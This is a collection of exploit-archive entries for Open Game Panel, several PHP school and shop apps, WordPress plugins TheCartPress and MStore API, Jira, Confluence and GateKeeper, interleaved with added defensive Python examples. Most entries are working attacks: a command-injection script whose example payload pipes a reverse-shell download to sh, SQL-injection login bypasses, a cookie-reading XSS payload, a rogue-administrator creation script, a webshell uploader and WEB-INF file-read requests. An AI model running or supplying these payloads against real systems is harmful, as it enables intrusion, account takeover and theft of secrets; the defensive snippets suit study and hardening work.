# Exploit Title: Open Game Panel - Remote Code Execution (RCE) (Authenticated)
# Google Dork: intext:"Open Game Panel 2021"
# Date: 08/14/2021
# Exploit Author: prey
# Vendor Homepage: https://www.opengamepanel.org/
# Software Link: https://github.com/OpenGamePanel/OGP-Website
# Version: before 14 Aug patch (https://github.com/OpenGamePanel/OGP-Website/pull/561/commits)
# Tested on: CentOS Linux 5.4.102

# Before the patch, it was possible to inject system commands via the "map" parameter when launching a new Counter-Strike server,
# simply by wrapping the command between ';' characters. The user needs to be authenticated for this.


import requests

banner = """
@
@                                                     @@&    @@@@@/
@                                                      @&   #@@@@@&       .=
,/%@#
@                                                     @@@@@@@@@@@@@((%@@@@*
@                                                     #@@@@@@@@@@@@@@@*%@,
@                                                     @@@@@@@@@@@@@@&@@@@
@                                                    &@@@@@@@@@/   &@@@.
@                                                    @@@@@@@@@(
@                                                    @@@@@@@@@@@@@&*
@                                                     &@@@@@@@@@@@@@@@@%
@                                                        ,&@@@@@@@@@@@@@
@                                                          %@@@@@@@.
@                                              .%@@@@@@@@% @@@@@@
@                                          @@@@@#       .&@@@@#
@            (@@@@@@@@@@@.             .@@@&               @@%
@       .@@@@@,         #@@@@@*      #@@@                   @@@@@
@     @@@&                   &@@@.  @@@
@  ,@@@                         @@@@@@
@ @@@                            %@@@,
@&@@                              @@@,
@@@@
@@@@

 *@@@@@# @@  *@@  %@  @@@  @@      @@@@@/  @@@   @@@       ,@@@   ,@(    .@=
%
 *@/  @@ .@/ @(@  @@  @@@( @@         ,@(  @@@* @#@@       @@(@   ,@(    .@=
%
 *@@@@@@  @@ @ &&.@(  @@ @.@@       @@@@   @@.@(@ @@      (@. @@  ,@(    .@=
%
 *@/      %@(@  @@@   @@ *@@@          @@  @@ @@. @@      @@@@@@, ,@(    .@=
%
 *@/       @@*  @@@   @@  %@@      @@@@@*  @@     @@     &@    @@ ,@@@@@ .@=
@@@@

##You can get mod_id and home_id from your game panel URL once you are logged in

"""
print(banner)

target = input("Target url:  (eg: https://panel.example.org)\n")
opengamepanel_web = input("opengamepanel_web Cookie: (eg: kulonmu5ldu71nmggv2p571nu1)\n")
mod_id = input("Mod_id value: (eg: 2437)\n")
home_id = input("Home_id value: (eg: 3737)\n")
server_ip_port = input("Server IP:port: (eg: 192.168.69.69:42069)\n")
command = input("Payload: (eg: curl https://reverse-shell.sh/1.1.1.1:1337|sh)\n")

url = target + "/home.php?m=gamemanager&p=game_monitor"
cookies = {"opengamepanel_web": opengamepanel_web}
headers = {"Content-Type": "application/x-www-form-urlencoded"}
data = {"mod_id": mod_id, "home_id": home_id, "ip_port": server_ip_port, "map": ";" + command + ";", "start_server": "whatever"}
try:
    requests.post(url, headers=headers, cookies=cookies, data=data)
except requests.RequestException as exc:
    # Transport-level failure: the request never reached the panel, or the connection dropped.
    print("Something went wrong, check your inputs or try manually exploiting the map parameter")
    print(exc)
print("Finished. you can now literally read the file $HOME/OGP/Cfg/Config.pm for the root password yaay! (CVE-2021-37157)")
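The defect above is that a user-supplied map name ends up inside a shell command line. The following added example (not OGP's code, and not part of the advisory) shows the two server-side controls that close that class of bug: an allowlist on the map name, and building the launch command as an argv list so no shell ever parses the value. It also includes a small detection helper that flags offending `map` values in captured POST bodies. The `-port`/`+map` flag layout and the binary path are assumptions for illustration; the sample bodies are constructed.

```python
import re
import subprocess
import urllib.parse

# Allowlist for a user-supplied map name: Source-engine map names are plain
# identifiers, so anything outside this character set is rejected outright.
MAP_NAME_RE = re.compile(r"[A-Za-z0-9_\-]{1,64}")


def is_safe_map_name(name):
    """Return True only if the map name is a plain identifier (no shell metacharacters)."""
    return MAP_NAME_RE.fullmatch(name) is not None


def build_launch_argv(server_binary, map_name, port):
    """Build the game-server command as an argv list, never as a shell string.

    The flag layout ("-port", "+map") is an assumption for illustration; the
    point is that the map value is one argv element, so a value such as ';id;'
    is rejected here and could not be interpreted by a shell even if it passed.
    """
    if not is_safe_map_name(map_name):
        raise ValueError("rejected map name: %r" % (map_name,))
    if not 1024 <= int(port) <= 65535:
        raise ValueError("rejected port: %r" % (port,))
    return [server_binary, "-port", str(port), "+map", map_name]


def launch(argv):
    """Start the server with shell=False so argv goes straight to execve."""
    return subprocess.Popen(argv, shell=False)


def flag_map_values(form_bodies):
    """Detection helper: return every 'map' value in the POST bodies that fails the allowlist."""
    hits = []
    for body in form_bodies:
        fields = urllib.parse.parse_qs(body, keep_blank_values=True)
        for value in fields.get("map", []):
            if not is_safe_map_name(value):
                hits.append(value)
    return hits


# Constructed sample bodies in the shape of the game_monitor request above.
SAMPLE_BODIES = [
    "mod_id=2437&home_id=3737&ip_port=10.0.0.5%3A27015&map=de_dust2&start_server=1",
    "mod_id=2437&home_id=3737&ip_port=10.0.0.5%3A27015&map=%3Bid%3B&start_server=1",
    "mod_id=2437&home_id=3737&ip_port=10.0.0.5%3A27015&map=cs_office&start_server=1",
]

if __name__ == "__main__":
    print("flagged map values:", flag_map_values(SAMPLE_BODIES))
    print("argv:", build_launch_argv("/opt/srcds/srcds_run", "de_dust2", 27015))
```

The allowlist is the control that matters for input coming from an authenticated but untrusted panel user; the argv construction is defence in depth, because a list passed to `subprocess` without `shell=True` is never re-parsed by `/bin/sh`.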
            
# Exploit Title: Student Quarterly Grading System 1.0 - SQLi Authentication Bypass
# Date: 04.10.2021
# Exploit Author: Blackhan
# Vendor Homepage: https://www.sourcecodester.com/php/14953/student-quarterly-grading-system-using-php-and-sqlite-free-source-code.html
# Software Link: https://www.sourcecodester.com/download-code?nid=14953&title=Student+Quarterly+Grading+System+using+PHP+and+SQLite+Database+Free+Source+Code
# Version: 1.0
# Tested on: Windows 10, Kali Linux
# Student Quarterly Grading System v1.0 Login page can be bypassed with a simple SQLi to the username parameter.

Steps To Reproduce:
1 - Go to the login page http://localhost/grading_system/login.php
2 - Enter the payload to username field as "bypass' or 1=1-- -" without double-quotes and type anything to password field.
3 - Click on "Login" button and you are logged in as administrator.

PoC

POST /grading_system/Actions.php?a=login HTTP/1.1
Host: localhost
Content-Length: 45
sec-ch-ua: "Chromium";v="93", " Not;A Brand";v="99"
Accept: application/json, text/javascript, */*; q=0.01
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36
sec-ch-ua-platform: "Windows"
Origin: http://localhost
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://localhost/grading_system/login.php
Accept-Encoding: gzip, deflate
Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7
Cookie: PHPSESSID=arkil63kkqsabj3b8cf3oimm2j
Connection: close

username=bypass'+or+1%3D1--+-&password=bypass
            
# Exploit Title: Young Entrepreneur E-Negosyo System 1.0 - 'PRODESC' Stored Cross-Site Scripting (XSS)
# Date: 2021-10-03
# Exploit Author: Jordan Glover
# Vendor Homepage: https://www.sourcecodester.com/php/12684/young-entrepreneur-e-negosyo-system.html
# Software Link: https://www.sourcecodester.com/download-code?nid=12684&title=Young+Entrepreneur+E-Negosyo+System+in+PHP+Free+Source+Code
# Version: v1.0
# Tested on: Windows 10 + XAMPP v3.3.0

Young Entrepreneur E-Negosyo System 1.0 suffers from a Cross Site Scripting (XSS) vulnerability.

Step 1 - Create a new product to sell - http://localhost/bsenordering/admin/products/index.php?view=add
Step 2 - Fill out all required fields to create a new product. Input a payload in the product description field - <script>alert(document.cookie)</script>
Step 3 - Save the product.

The stored XSS triggers for all users that navigate to the home page.

POC

POST /bsenordering/admin/products/controller.php?action=add HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------375756297829058981022228786743
Content-Length: 1203
Origin: http://localhost
Connection: close
Referer: http://localhost/bsenordering/admin/products/index.php?view=add
Cookie: PHPSESSID=794albocs4b1st3m9hsileorpg
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1

-----------------------------375756297829058981022228786743
Content-Disposition: form-data; name="OWNERNAME"

Test
-----------------------------375756297829058981022228786743
Content-Disposition: form-data; name="OWNERPHONE"

0000000000
-----------------------------375756297829058981022228786743
Content-Disposition: form-data; name="PRODESC"

<script>alert(document.cookie)</script>
-----------------------------375756297829058981022228786743
Content-Disposition: form-data; name="CATEGORY"

3
-----------------------------375756297829058981022228786743
Content-Disposition: form-data; name="ORIGINALPRICE"

100
-----------------------------375756297829058981022228786743
Content-Disposition: form-data; name="PROPRICE"

100
-----------------------------375756297829058981022228786743
Content-Disposition: form-data; name="PROQTY"

100
-----------------------------375756297829058981022228786743
Content-Disposition: form-data; name="image"; filename=""
Content-Type: application/octet-stream


-----------------------------375756297829058981022228786743
Content-Disposition: form-data; name="save"


-----------------------------375756297829058981022228786743--
            
# Exploit Title: Young Entrepreneur E-Negosyo System 1.0 - SQL Injection Authentication Bypass
# Date: 2021-10-02
# Exploit Author: Jordan Glover
# Vendor Homepage: https://www.sourcecodester.com/php/12684/young-entrepreneur-e-negosyo-system.html
# Software Link: https://www.sourcecodester.com/download-code?nid=12684&title=Young+Entrepreneur+E-Negosyo+System+in+PHP+Free+Source+Code
# Version: v1.0
# Tested on: Windows 10 + XAMPP v3.3.0

Steps-To-Reproduce:
Step 1 – Go to the admin panel http://localhost/bsenordering/admin/login.php
Step 2 – Enter the default admin username janobe and the password test
Step 3 – Click on Sign in and capture the request in Burp Suite
Step 4 – Change the user_email to janobe' or '1'='1
Step 5 – Click forward and you will be logged in as an admin.

POC 

POST /bsenordering/admin/login.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 40
Origin: http://localhost
Connection: close
Referer: http://localhost/bsenordering/admin/login.php
Cookie: PHPSESSID=him428198e798r23eagi9mapjk
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1

user_email=janobe' or '1'='1&user_pass=test&btnLogin=
            
# Exploit Title: Wordpress Plugin TheCartPress 1.5.3.6 - Privilege Escalation (Unauthenticated)
# Google Dork: inurl:/wp-content/plugins/thecartpress/
# Date: 04/10/2021
# Exploit Author: spacehen
# Vendor Homepage: https://wordpress.org/plugin/thecartpress
# Version: <= 1.5.3.6
# Tested on: Ubuntu 20.04.1

import sys

import requests


def print_banner():
    print("TheCartPress <= 1.5.3.6 - Unauthenticated Privilege Escalation")
    print("Author -> space_hen (www.github.com/spacehen)")


def print_usage():
    print("Usage: python3 exploit.py [target url]")
    print("Ex: python3 exploit.py https://example.com")


def vuln_check(uri):
    # The AJAX registration handler answers an empty request with this
    # validation message when it is reachable without authentication.
    response = requests.get(uri)
    return "User name is required" in response.text


def main():
    print_banner()
    if len(sys.argv) != 2:
        print_usage()
        sys.exit(1)

    base = sys.argv[1].rstrip("/")
    ajax_action = "tcp_register_and_login_ajax"
    admin = "/wp-admin/admin-ajax.php"
    uri = base + admin + "?action=" + ajax_action

    if not vuln_check(uri):
        print("(*) Target not vulnerable!")
        sys.exit(1)

    # The role is taken from the client-supplied tcp_role field, which is the bug.
    data = {
        "tcp_new_user_name": "admin_02",
        "tcp_new_user_pass": "admin1234",
        "tcp_repeat_user_pass": "admin1234",
        "tcp_new_user_email": "test@test.com",
        "tcp_role": "administrator",
    }
    print("Inserting admin...")
    response = requests.post(uri, data=data)
    if response.text == '""':
        print("Success!")
        print("Now login at /wp-admin/")
    else:
        print(response.text)


if __name__ == "__main__":
    main()
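The root cause here is a registration handler that trusts a client-supplied `tcp_role` field. The added example below (a Python model of the server-side decision; TheCartPress itself is PHP and this is not its code) shows how such an endpoint should decide the role: unauthenticated self-registration never honours the requested role, only an actor who already holds user-creation rights may choose from an allowlist, and a privileged role requested by anyone else is flagged for logging. The role sets are assumptions; the form field names mirror the request above.

```python
DEFAULT_ROLE = "subscriber"
SELF_REGISTRATION_ROLES = {"subscriber", "customer"}          # assumed allowlist
ADMIN_ASSIGNABLE_ROLES = SELF_REGISTRATION_ROLES | {"shop_manager", "editor", "administrator"}


class RegistrationError(Exception):
    pass


def register_user(form, actor_can_create_users=False):
    """Validate an untrusted registration form and decide the role server-side.

    `form` uses the field names from the request above (tcp_new_user_name,
    tcp_role, ...). Unauthenticated self-registration never honours tcp_role;
    only an actor with user-creation rights may pick from the admin allowlist.
    Returns the record to persist plus an audit flag.
    """
    name = (form.get("tcp_new_user_name") or "").strip()
    if not name:
        raise RegistrationError("User name is required")
    password = form.get("tcp_new_user_pass") or ""
    if len(password) < 8:
        raise RegistrationError("Password too short")
    if password != form.get("tcp_repeat_user_pass"):
        raise RegistrationError("Passwords do not match")
    email = (form.get("tcp_new_user_email") or "").strip()
    if "@" not in email:
        raise RegistrationError("Invalid email")

    requested = form.get("tcp_role")
    if actor_can_create_users and requested in ADMIN_ASSIGNABLE_ROLES:
        role = requested
    elif requested in SELF_REGISTRATION_ROLES:
        role = requested
    else:
        role = DEFAULT_ROLE          # the client's wish is simply ignored

    # A privileged role requested by someone who may not grant it is worth an audit log entry.
    suspicious = (requested is not None
                  and requested not in SELF_REGISTRATION_ROLES
                  and not actor_can_create_users)
    return {"user_name": name, "email": email, "role": role,
            "suspicious_role_request": suspicious}


if __name__ == "__main__":
    # Constructed form in the shape of the exploit's POST body.
    sample = {"tcp_new_user_name": "admin_02", "tcp_new_user_pass": "admin1234",
              "tcp_repeat_user_pass": "admin1234", "tcp_new_user_email": "test@test.com",
              "tcp_role": "administrator"}
    print(register_user(sample))
```

In WordPress terms the `actor_can_create_users` flag corresponds to a capability check (`create_users`) before any role other than the default is accepted; the audit flag is what you would hook into logging or alerting.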
            
# Exploit Title: Atlassian Jira Server Data Center 8.16.0 - Arbitrary File Read
# Date: 2021-10-05
# Exploit Author: Mayank Deshmukh
# Vendor Homepage: https://www.atlassian.com/
# Software Link: https://www.atlassian.com/software/jira/download/data-center
# Version: versions < 8.5.14, 8.6.0 ≤ version < 8.13.6, 8.14.0 ≤ version < 8.16.1
# Tested on: Kali Linux & Windows 10
# CVE : CVE-2021-26086

POC File #1 - web.xml

GET /s/cfx/_/;/WEB-INF/web.xml HTTP/1.1
Host: 127.0.0.1:8080
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close


POC File #2 - seraph-config.xml

GET /s/cfx/_/;/WEB-INF/classes/seraph-config.xml HTTP/1.1
Host: 127.0.0.1:8080
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close

POC File #3 - decorators.xml

GET /s/cfx/_/;/WEB-INF/decorators.xml HTTP/1.1
Host: 127.0.0.1:8080
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close


POC File #4 - /jira-webapp-dist/pom.properties

GET /s/cfx/_/;/META-INF/maven/com.atlassian.jira/jira-webapp-dist/pom.properties HTTP/1.1
Host: 127.0.0.1:8080
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close

POC File #5 - /jira-webapp-dist/pom.xml

GET /s/cfx/_/;/META-INF/maven/com.atlassian.jira/jira-webapp-dist/pom.xml HTTP/1.1
Host: 127.0.0.1:8080
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close

POC File #6 - /atlassian-jira-webapp/pom.xml

GET /s/cfx/_/;/META-INF/maven/com.atlassian.jira/atlassian-jira-webapp/pom.xml HTTP/1.1
Host: 127.0.0.1:8080
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close

POC File #7 - /atlassian-jira-webapp/pom.properties

GET /s/cfx/_/;/META-INF/maven/com.atlassian.jira/atlassian-jira-webapp/pom.properties HTTP/1.1
Host: 127.0.0.1:8080
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close
            
# Exploit Title: Atlassian Confluence 7.12.2 - Pre-Authorization Arbitrary File Read
# Date: 2021-10-05
# Exploit Author: Mayank Deshmukh
# Vendor Homepage: https://www.atlassian.com/
# Software Link: https://www.atlassian.com/software/confluence/download-archives
# Version: version < 7.4.10 and 7.5.0 ≤ version < 7.12.3
# Tested on: Kali Linux & Windows 10
# CVE : CVE-2021-26085

POC #1 - web.xml

GET /s/123cfx/_/;/WEB-INF/web.xml HTTP/1.1
Host: 127.0.0.1:8090
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close

POC #2 - seraph-config.xml

GET /s/123cfx/_/;/WEB-INF/classes/seraph-config.xml HTTP/1.1
Host: 127.0.0.1:8090
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close

POC #3 - pom.properties

GET /s/123cfx/_/;/META-INF/maven/com.atlassian.confluence/confluence-webapp/pom.properties HTTP/1.1
Host: 127.0.0.1:8090
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close

POC #4 - pom.xml

GET /s/123cfx/_/;/META-INF/maven/com.atlassian.confluence/confluence-webapp/pom.xml HTTP/1.1
Host: 127.0.0.1:8090
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close
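Both the Jira (CVE-2021-26086) and Confluence (CVE-2021-26085) requests above reach `WEB-INF` and `META-INF` through a static-resource path that carries a `;` segment before the protected directory. The added example below (not Atlassian's code, and not part of either advisory) shows the canonicalisation a front-end or WAF should apply before deciding whether a path touches a protected directory, and runs that check over a few constructed access-log lines to flag such requests in detection. It also handles percent-encoded forms of the same shape. The log lines are constructed; the resource paths in them are placeholders.

```python
import re
from urllib.parse import unquote

PROTECTED_DIRS = {"web-inf", "meta-inf"}


def strip_path_params(path):
    """Drop ';param' suffixes from every segment (RFC 3986 path parameters)."""
    return "/".join(segment.split(";", 1)[0] for segment in path.split("/"))


def normalize_path(raw):
    """Canonicalise a request path before any access decision: drop the query
    string, percent-decode twice (to catch double encoding), strip path
    parameters and resolve '.' and '..' segments."""
    path = raw.split("?", 1)[0]
    path = unquote(unquote(path))
    path = strip_path_params(path)
    resolved = []
    for segment in path.split("/"):
        if segment in ("", "."):
            continue
        if segment == "..":
            if resolved:
                resolved.pop()
            continue
        resolved.append(segment)
    return "/" + "/".join(resolved)


def touches_protected_dir(raw):
    """True if the canonical path has a WEB-INF or META-INF component anywhere."""
    return any(seg.lower() in PROTECTED_DIRS for seg in normalize_path(raw).split("/"))


LOG_LINE_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[0-9.]+" (\d{3})')


def find_protected_requests(log_lines):
    """Return (request path, status) for log lines whose path reaches a protected dir."""
    hits = []
    for line in log_lines:
        m = LOG_LINE_RE.search(line)
        if m and touches_protected_dir(m.group(1)):
            hits.append((m.group(1), m.group(2)))
    return hits


# Constructed access-log lines (combined log format); resource paths are placeholders.
SAMPLE_LOG = [
    '10.0.0.7 - - [05/Oct/2021:10:01:02 +0000] "GET /s/cfx/_/;/WEB-INF/web.xml HTTP/1.1" 200 6210 "-" "Mozilla/5.0"',
    '10.0.0.7 - - [05/Oct/2021:10:01:03 +0000] "GET /s/cfx/_/download/resources/example/app.css HTTP/1.1" 200 9100 "-" "Mozilla/5.0"',
    '10.0.0.7 - - [05/Oct/2021:10:01:04 +0000] "GET /s/123cfx/_/%3B/META-INF/maven/com.atlassian.confluence/confluence-webapp/pom.xml HTTP/1.1" 200 1804 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [05/Oct/2021:10:02:00 +0000] "GET /browse/TEST-1 HTTP/1.1" 302 0 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for path, status in find_protected_requests(SAMPLE_LOG):
        print(status, path)
```

A `200` on such a path is the signal to act on: a patched instance answers these requests with an error status, so the status column separates a blocked probe from a successful read.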
            
# Exploit Title: Wordpress Plugin MStore API 2.0.6 - Arbitrary File Upload
# Google Dork: inurl:/wp-content/plugins/mstore-api/
# Date: 22/09/2021
# Exploit Author: spacehen
# Vendor Homepage: https://wordpress.org/plugins/mstore-api/
# Version: 2.0.6, possibly higher
# Tested on: Ubuntu 20.04.1

import os
import sys

import requests


def print_banner():
    print("MStore API < 2.0.6 - Arbitrary File Upload")
    print("Author -> space_hen (www.github.com/spacehen)")


def print_usage():
    print("Usage: python3 exploit.py [target url] [shell path]")
    print("Ex: python3 exploit.py https://example.com ./shell.php")


def vuln_check(uri):
    # An empty POST to the config_file route answers with this validation
    # message when the unauthenticated upload handler is reachable.
    response = requests.post(uri)
    return "Key must be" in response.text


def main():
    print_banner()
    if len(sys.argv) != 3:
        print_usage()
        sys.exit(1)

    base = sys.argv[1].rstrip("/")
    file_path = sys.argv[2]

    rest_url = "/wp-json/api/flutter_woo/config_file"
    uri = base + rest_url

    if not vuln_check(uri):
        print("(*) Target not vulnerable!")
        sys.exit(1)

    if not os.path.isfile(file_path):
        print("(*) Invalid file!")
        sys.exit(1)

    # The handler keeps the client-supplied filename; the file is opened in
    # binary mode so its bytes are sent unchanged.
    with open(file_path, "rb") as fh:
        files = {"file": ("config.json.php", fh, "application/json")}
        print("Uploading shell...")
        response = requests.post(uri, files=files)
    # response should be location of file
    print(response.text)


if __name__ == "__main__":
    main()
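The upload above succeeds because the endpoint stores whatever filename and bytes the client sends. The added example below (not the plugin's code, and not part of the advisory) shows the validation a "config file" upload handler needs: no path components, exactly one extension from an allowlist (so a double extension such as `config.json.php` is refused), content that actually parses as a JSON object regardless of the claimed MIME type, and a server-chosen filename on disk. The upload directory is an assumed location.

```python
import json
import os
import re
import secrets

ALLOWED_EXTENSIONS = {"json"}
STEM_RE = re.compile(r"[A-Za-z0-9_\-]{1,64}")


class UploadRejected(Exception):
    pass


def accept_config_upload(filename, content, upload_dir="/srv/app/config-uploads"):
    """Validate an uploaded config file and return (stored path, parsed config).

    Rejects anything that is not a single-extension .json name whose bytes
    parse as a JSON object, and never reuses the client's filename on disk.
    upload_dir is an assumed location for illustration.
    """
    if filename != os.path.basename(filename) or "\\" in filename:
        raise UploadRejected("path separators in filename")
    parts = filename.split(".")
    if len(parts) != 2:
        raise UploadRejected("exactly one extension is allowed")   # refuses config.json.php
    stem, ext = parts
    if ext.lower() not in ALLOWED_EXTENSIONS or not STEM_RE.fullmatch(stem):
        raise UploadRejected("extension or name not allowed")
    # The client's Content-Type is ignored: the bytes themselves must be JSON.
    try:
        data = json.loads(content.decode("utf-8"))
    except (UnicodeDecodeError, ValueError) as exc:
        raise UploadRejected("body is not valid JSON") from exc
    if not isinstance(data, dict):
        raise UploadRejected("config must be a JSON object")
    stored_name = secrets.token_hex(8) + ".json"      # server-chosen, never client-chosen
    return os.path.join(upload_dir, stored_name), data


def is_rejected(filename, content):
    """Convenience wrapper returning True when the upload would be refused."""
    try:
        accept_config_upload(filename, content)
    except UploadRejected:
        return True
    return False


if __name__ == "__main__":
    # Constructed inputs: the double-extension name from the exploit, and a valid config.
    print("config.json.php rejected:", is_rejected("config.json.php", b'{"a": 1}'))
    print(accept_config_upload("config.json", b'{"currency": "USD"}'))
```

Independently of this check, the directory that receives uploads should be served with script execution disabled, so that even a file that slips past validation is returned as static content rather than run by PHP.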
            
# Exploit Title: Odine Solutions GateKeeper 1.0 - 'trafficCycle' SQL Injection
# Date: 05.10.2021
# Exploit Author: Emel Basayar
# Vendor: Odine Solutions - odinesolutions.com
# Vendor Homepage: https://odinesolutions.com/software/gatekeeper-simbox-antifraud/
# Version: 1.0
# Category: Webapps
# Tested on: Ubuntu 18 LTS
# Description : The vulnerability allows an attacker to inject SQL commands from the search section through the 'trafficCycle' parameter.
# This vulnerability was discovered during a penetration test and has since been fixed.
====================================================

# PoC : SQLi :

GET /rass/api/v1/trafficCycle/98 HTTP/1.1
Host: 192.168.1.25
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:88.0) Gecko/20100101 Firefox/88.0
Accept: application/json
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Authorization: Bearer xm38HruG-htx0jNuM-l9UBCkoz-G7RigZvx
Origin: https://192.168.1.25
Connection: close
Referer: https://192.168.1.25

Parameter: #1* (URI)
    Type: error-based
    Title: PostgreSQL AND error-based - WHERE or HAVING clause
    Payload: https://192.168.1.25:443/rass/api/v1/trafficCycle/98' AND 5042=CAST((CHR(113)||CHR(118)||CHR(112)||CHR(118)||CHR(113))||(SELECT (CASE WHEN (5042=5042) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(118)||CHR(98)||CHR(120)||CHR(113)) AS NUMERIC)-- yrdB

    Type: stacked queries
    Title: PostgreSQL > 8.1 stacked queries (comment)
    Payload: https://192.168.1.25:443/rass/api/v1/trafficCycle/98';SELECT PG_SLEEP(5)--

    Type: time-based blind
    Title: PostgreSQL > 8.1 AND time-based blind
    Payload: https://192.168.1.25:443/rass/api/v1/trafficCycle/98' AND 9405=(SELECT 9405 FROM PG_SLEEP(5))-- PasC
---
web application technology: Nginx
back-end DBMS: PostgreSQL

====================================================
            
# Exploit Title: Wordpress Plugin BulletProof Security 5.1 - Sensitive Information Disclosure
# Date 04.10.2021
# Exploit Author: Ron Jost (Hacker5preme)
# Vendor Homepage: https://forum.ait-pro.com/read-me-first/
